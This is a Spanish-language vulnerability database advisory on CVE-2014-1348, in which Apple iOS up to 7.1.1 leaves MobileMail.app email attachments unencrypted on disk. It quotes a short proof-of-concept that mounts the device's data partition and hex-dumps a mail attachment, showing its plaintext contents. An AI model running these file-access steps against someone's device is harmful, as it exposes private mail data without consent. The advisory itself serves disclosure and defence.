Apple iOS hasta 7.1.1 Email Attachment MobileMail.app cifrado débil

CVSS Puntuación meta temporalPrecio actual del exploit (≈)Puntuación de interés CTI
3.3$0-$5k0.00

Resumeninformación

Una vulnerabilidad fue encontrada en Apple iOS hasta 7.1.1 y clasificada como problemática. Se ve afectada una función desconocida del archivo MobileMail.app del componente Email Attachment Handler. La manipulación conduce a cifrado débil. Esta vulnerabilidad se cataloga como CVE-2014-1348. Asimismo, existe un exploit disponible.

Detallesinformación

Una vulnerabilidad clasificada como problemática ha sido encontrada en Apple iOS hasta 7.1.1 (Smartphone Operating System). Una función desconocida del archivo MobileMail.app del componente Email Attachment Handler es afectada por esta vulnerabilidad. Por la manipulación de un input desconocido se causa una vulnerabilidad de clase cifrado débil. Esto tiene repercusión sobre la confidencialidad y integridad.

La vulnerabilidad fue publicada el 2014-04-23 por Andreas Kurtz con identificación What Apple Missed to Fix in iOS 7.1.1 con un blog post (Website) (no está definido). El advisory puede ser descargado de andreas-kurtz.de. La publicación se realizó con la cooperación del fabricante. La vulnerabilidad es identificada como CVE-2014-1348. La vulnerabilidad es relativamente popular y aunque es muy compleja. El ataque debe ser hecho local. La explotación requiere una autentificación. Los detalles técnicos y un exploit público son conocidos.

Un exploit ha sido desarrollado por Andreas Kurtz en Shell y publicado inmediatamente después del anuncio. El exploit puede ser descargado de andreas-kurtz.de. Fue declarado como prueba de concepto. El código utilizado por el exploit es:

# mount_hfs /dev/disk0s1s2 /mnt2
# cd /mnt2/mobile/Library/Mail/

# xxd IMAP-MY_MAILADDRESS/INBOX.imapmbox/Attachments/4/2/my_file.pdf 
0000000: 2550 4446 2d31 2e34 0a25 81e2 81e3 81cf  %PDF-1.4.%......
0000010: 81d3 5c72 0a31 2030 206f 626a 0a3c 3c0a  ..\r.1 0 obj.<<.
0000020: 2f43 7265 6174 696f 6e44 6174 6520 2844  /CreationDate (D
0000030: 3a32 3031 3330 3830 3532 3034 3830 3329  :20130805204803)
0000040: 0a2f 4d6f 6444 6174 6520 2844 3a32 3031  ./ModDate (D:201
0000050: 3330 3830 3532 3034 3830 3329 0a2f 5469  30805204803)./Ti
0000060: 746c 6520 2852 2047 7261 7068 6963 7320  tle (R Graphics 
0000070: 4f75 7470 7574 290a 2f50 726f 6475 6365  Output)./Produce
0000080: 7220 2852 2033 2e30 2e31 290a 2f43 7265  r (R 3.0.1)./Cre
0000090: 6174 6f72 2028 5229 0a3e 3e0a 656e 646f  ator (R).>>.endo

No hay información respecto a posibles contramedidas. Se sugiere sustituir el producto con un equivalente.

La vulnerabilidad también está documentado en las bases de datos X-Force (93048), SecurityFocus (BID 67263†) y OSVDB (106668†). If you want to get best quality of vulnerability data, you may have to visit VulDB.

No se ve afectado

  • Apple iOS hasta 7.0.3

Productoinformación

Escribe

Proveedor

Nombre

Versión

Licencia

Sitio web

CPE 2.3información

CPE 2.2información

CVSSv4información

VulDB Vector: 🔍
VulDB Confiabilidad: 🔍

CVSSv3información

VulDB Puntuación meta base: 3.6
VulDB Puntuación meta temporal: 3.3

VulDB Puntuación base: 3.6
VulDB Puntuación temporal: 3.3
VulDB Vector: 🔍
VulDB Confiabilidad: 🔍

CVSSv2información

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplejidadAutenticaciónConfidencialidadIntegridadDisponibilidad
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Puntuación base: 🔍
VulDB Puntuación temporal: 🔍
VulDB Confiabilidad: 🔍

NVD Puntuación base: 🔍

Explotacióninformación

Clase: Cifrado débil
CWE: CWE-310
CAPEC: 🔍
ATT&CK: 🔍

Físico: En parte
Local: Sí
Remoto: No

Disponibilidad: 🔍
Acceso: Público
Estado: Prueba de concepto
Autor: Andreas Kurtz
Lenguaje de programación: 🔍
Descargar: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Predicción de precios: 🔍
Estimación del precio actual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HoyDesbloquearDesbloquearDesbloquearDesbloquear

Inteligencia de amenazasinformación

Interés: 🔍
Actores activos: 🔍
Grupos APT activos: 🔍

Contramedidasinformación

Recomendación: no contramedida conocida
Estado: 🔍

Hora de 0 días: 🔍
Tiempo de retraso de explotación: 🔍

Línea de tiempoinformación

2014-01-08 🔍
2014-04-23 +105 días 🔍
2014-04-23 +0 días 🔍
2014-05-06 +13 días 🔍
2014-05-07 +1 días 🔍
2014-07-01 +55 días 🔍
2021-06-19 +2545 días 🔍

Fuentesinformación

Proveedor: apple.com

Aviso: What Apple Missed to Fix in iOS 7.1.1
Investigador: Andreas Kurtz
Estado: No está definido
Confirmación: 🔍
Coordinado: 🔍

CVE: CVE-2014-1348 (🔍)
GCVE (CVE): GCVE-0-2014-1348
GCVE (VulDB): GCVE-100-13148

IAVM: 🔍

X-Force: 93048 - Apple MobileMail.app information disclosure, Low Risk
SecurityFocus: 67263 - Apple iOS 'MobileMail.app' Local Information Disclosure Vulnerability
OSVDB: 106668
SecurityTracker: 1030500

scip Labs: https://www.scip.ch/en/?labs.20150917
Misceláneo: 🔍
Véase también: 🔍

Artículoinformación

Fecha de creación: 2014-05-06 17:33
Actualizado: 2021-06-19 10:18
Cambios: 2014-05-06 17:33 (81), 2019-04-02 09:36 (1), 2021-06-19 10:18 (4)
Completo: 🔍
Cache ID: 216:B63:103

Discusión

Sin comentarios aún. Idiomas: es + pt + en.

Por favor, inicie sesión para comentar.

Interested in the pricing of exploits?

See the underground prices here!